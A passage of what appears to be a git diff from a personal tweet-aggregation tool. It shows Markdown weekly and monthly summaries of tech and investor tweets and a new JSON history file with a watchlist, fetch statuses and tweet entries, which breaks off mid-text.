Raw data environment • lower accuracy • higher risk • inefficient o…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779308794077361#m)\n\n**[2026-04-27T15:00:25+00:00]**\n> R to @Ronald_vanLoon: The biggest misconception? Speed = progress. In reality: → Teams are innovating faster than they can govern → Outputs are inconsistent and hard to trust → Risk is increasing qui…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779304683581558#m)\n\n**[2026-04-27T15:00:24+00:00]**\n> Pinned: Everyone thinks they’re scaling AI. Most are just scaling chaos. What I’m seeing, including in conversations with @collibra, is a dangerous illusion → faster experimentation → more pilots → z…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779299574911274#m)\n\n**[2026-04-27T14:23:11+00:00]**\n> #AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul? by @measure_plan #ArtificialIntelligence #MachineLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m)\n\n**[2026-04-27T13:45:07+00:00]**\n> How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m)\n\n**[2026-04-27T13:11:07+00:00]**\n> Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intelligent systems around th…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is hybrid. → proprieta…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m)\n\n**[2026-04-27T13:00:19+00:00]**\n> R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestration → secure executi…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m)\n\n**[2026-04-27T13:00:18+00:00]**\n> Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one level up, where AI b…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m)\n\n**[2026-04-27T12:50:08+00:00]**\n> Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m)\n\n**[2026-04-27T12:18:17+00:00]**\n> AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m)\n\n**[2026-04-27T11:20:17+00:00]**\n> Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m)\n\n**[2026-04-23T07:27:06+00:00]**\n> RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom by @rivr_tech #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m)\n\n**[2026-04-23T06:57:05+00:00]**\n> RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions by @IntEngineering #Robotics #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m)\n\n**[2026-04-23T06:23:14+00:00]**\n> RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour by @AadityaAnand_11 #Robotics #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m)\n\n**[2026-04-23T05:50:01+00:00]**\n> RT by @Ronald_vanLoon: 12 #AI Terms to Learn by @Python_Dv #ArtificialIntelligence #MachineLearning #ML #MI\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m)\n\n**[2026-04-23T05:27:12+00:00]**\n> RT by @Ronald_vanLoon: Antigravity A1: Redefining Aerial Imaging with 8K 360° Panoramic Vision by @Insta360Japan #EmergingTech #Innovation #TechForGood #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047185500134351287#m)\n\n---\n\n### ✅ @erikbryn — Erik Brynjolfsson(6 条)\n\n**[2026-04-25T03:06:05+00:00]**\n> Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. Here are some of his insights from his visit to my Lab. @FutureJurvetson @Stanford @DigEconLab\n[原文链接](https://nitter.net/erikbryn/status/2047874760542200042#m)\n\n**[2026-04-24T23:32:43+00:00]**\n> RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional e…\n[原文链接](https://nitter.net/RonnieChatterji/status/2047821064437424288#m)\n\n**[2026-04-23T18:14:10+00:00]**\n> RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global econ…\n[原文链接](https://nitter.net/DigEconLab/status/2047378514240999569#m)\n\n**[2026-04-22T01:22:04+00:00]**\n> RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea! Your optimistic take on the value that humans will continue to deliver was so refreshing.\n[原文链接](https://nitter.net/TejuAdeyinka/status/2046761422148018260#m)\n\n**[2026-04-21T21:13:05+00:00]**\n> RT by @erikbryn: How do AI agents influence knowledge work? @SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three p…\n[原文链接](https://nitter.net/DigEconLab/status/2046698761221783753#m)\n\n**[2026-04-21T17:10:57+00:00]**\n> RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323 class at @Stanford today. Questions?\n[原文链接](https://nitter.net/saranormous/status/2046637828025835983#m)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @Svwang1 — 王川(6 条)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://nitter.net/Svwang1/status/2047858045057909226#m)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://nitter.net/Svwang1/status/2047703469063377001#m)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://nitter.net/Svwang1/status/2047472537488302502#m)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://nitter.net/Svwang1/status/2047470402725921150#m)\n\n**[2026-04-20T21:42:30+00:00]**\n> 很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。\n[原文链接](https://nitter.net/Svwang1/status/2046343776378257515#m)\n\n**[2026-04-20T21:13:36+00:00]**\n> 很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。\n[原文链接](https://nitter.net/Svwang1/status/2046336504407142606#m)\n\n---\n\n### ⚠️ @老胡 — 老胡(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @比特币超级玩家 — 超级玩家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T15:36:53.862287+00:00\n**分析账号**: 33个 | **活跃账号**: 18个 | **推文总量**: 248条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:169 条\n- **模型能力**:47 条\n- **投融资与并购**:12 条\n- **交易与市场**:11 条\n- **算力与芯片**:9 条\n\n## 三、活跃账号 Top10\n\n- @Ronald_vanLoon: 20 条\n- @sama: 20 条\n- @paulg: 20 条\n- @eladgil: 20 条\n- @jason: 19 条\n- @GaryMarcus: 19 条\n- @HarryStebbings: 19 条\n- @DavidSacks: 19 条\n- @ylecun: 19 条\n- @elonmusk: 18 条\n\n## 四、代表性推文\n\n- @Ronald_vanLoon | 2026-04-27T15:23:07+00:00\n - Faster Than Human Reflexes: A #Robotic Hand Redefining Speed and Precision by @sciencegirl #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048785019083128974#m\n- @elonmusk | 2026-04-27T15:15:09+00:00\n - If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n - https://nitter.net/elonmusk/status/2048783014075777369#m\n- @jason | 2026-04-27T15:03:32+00:00\n - Best accounts for following Austin air quality? @grok\n - https://nitter.net/Jason/status/2048780089295302690#m\n- @Ronald_vanLoon | 2026-04-27T15:00:27+00:00\n - R to @Ronald_vanLoon: Here’s the bottom line: AI won’t be won by who moves fastest. It’ll be won by who governs best. If your data isn’t structured, contextualized, and controlled…\n - https://nitter.net/Ronald_vanLoon/status/2048779312854118829#m\n- @Ronald_vanLoon | 2026-04-27T15:00:26+00:00\n - R to @Ronald_vanLoon: The real bottleneck isn’t models. It’s unstructured data. I saw a side-by-side demo that made this obvious: → Raw data environment • lower accuracy • higher …\n - https://nitter.net/Ronald_vanLoon/status/2048779308794077361#m\n- @Ronald_vanLoon | 2026-04-27T15:00:25+00:00\n - R to @Ronald_vanLoon: The biggest misconception? Speed = progress. In reality: → Teams are innovating faster than they can govern → Outputs are inconsistent and hard to trust → Ri…\n - https://nitter.net/Ronald_vanLoon/status/2048779304683581558#m\n- @Ronald_vanLoon | 2026-04-27T15:00:24+00:00\n - Pinned: Everyone thinks they’re scaling AI. Most are just scaling chaos. What I’m seeing, including in conversations with @collibra, is a dangerous illusion → faster experimentati…\n - https://nitter.net/Ronald_vanLoon/status/2048779299574911274#m\n- @elonmusk | 2026-04-27T14:53:45+00:00\n - Excellent point\n - https://nitter.net/elonmusk/status/2048777628019032335#m\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://nitter.net/GaryMarcus/status/2048771044987777428#m\n- @Ronald_vanLoon | 2026-04-27T14:23:11+00:00\n - #AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul? by @measure_plan #ArtificialIntelligence #MachineLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is …\n - https://nitter.net/HarryStebbings/status/2048764741435179442#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://nitter.net/HarryStebbings/status/2048764743205134644#m\n- @Ronald_vanLoon | 2026-04-27T13:45:07+00:00\n - How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @Ronald_vanLoon | 2026-04-27T13:11:07+00:00\n - Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_161620.json b/data/x_brief/history/20260427_161620.json new file mode 100644 index 0000000..787a51b --- /dev/null +++ b/data/x_brief/history/20260427_161620.json @@ -0,0 +1,3042 @@ +{ + "generated_at": "2026-04-27T16:13:14.007052+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "andrejkarpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "liuliu", + "name": "刘进" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 257 + }, + "period": { + "days": 7, + "start_utc": "2026-04-20T16:12:34.988675+00:00", + "end_utc": "2026-04-27T16:13:14.007052+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 27, + "active_accounts": 20, + "total_tweets": 257, + "failed_accounts": 1, + "source_hits": { + "nitter": 25 + }, + "source_errors": { + "snscrape": 1, + "nitter": 1, + "rsshub": 1 + } + }, + "accounts": [ + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://nitter.net/AndrewYNg/status/2048793852702757151#m", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter", + "title_zh": "AI原生的软件工程团队与传统团队运作方式截然不同。AI团队通过使用代码代理快速构建产品,这一变化使部分优秀工程师的角色从单纯的编码扩展到产品经理、设计师甚至有时是营销人员。此外,小型团队在共享办公环境中进行面对面沟通,也能实现极高的效率。" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", + "url": "https://nitter.net/GaryMarcus/status/2048791912149295182#m", + "published_at": "2026-04-27T15:50:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", + "url": "https://nitter.net/GaryMarcus/status/2048787646206677207#m", + "published_at": "2026-04-27T15:33:34+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", + "url": "https://nitter.net/GaryMarcus/status/2048787157536653627#m", + "published_at": "2026-04-27T15:31:37+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", + "url": "https://nitter.net/elonmusk/status/2048783014075777369#m", + "published_at": "2026-04-27T15:15:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Best accounts for following Austin air quality? @grok", + "url": "https://nitter.net/Jason/status/2048780089295302690#m", + "published_at": "2026-04-27T15:03:32+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Excellent point", + "url": "https://nitter.net/elonmusk/status/2048777628019032335#m", + "published_at": "2026-04-27T14:53:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://nitter.net/GaryMarcus/status/2048771044987777428#m", + "published_at": "2026-04-27T14:27:36+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he 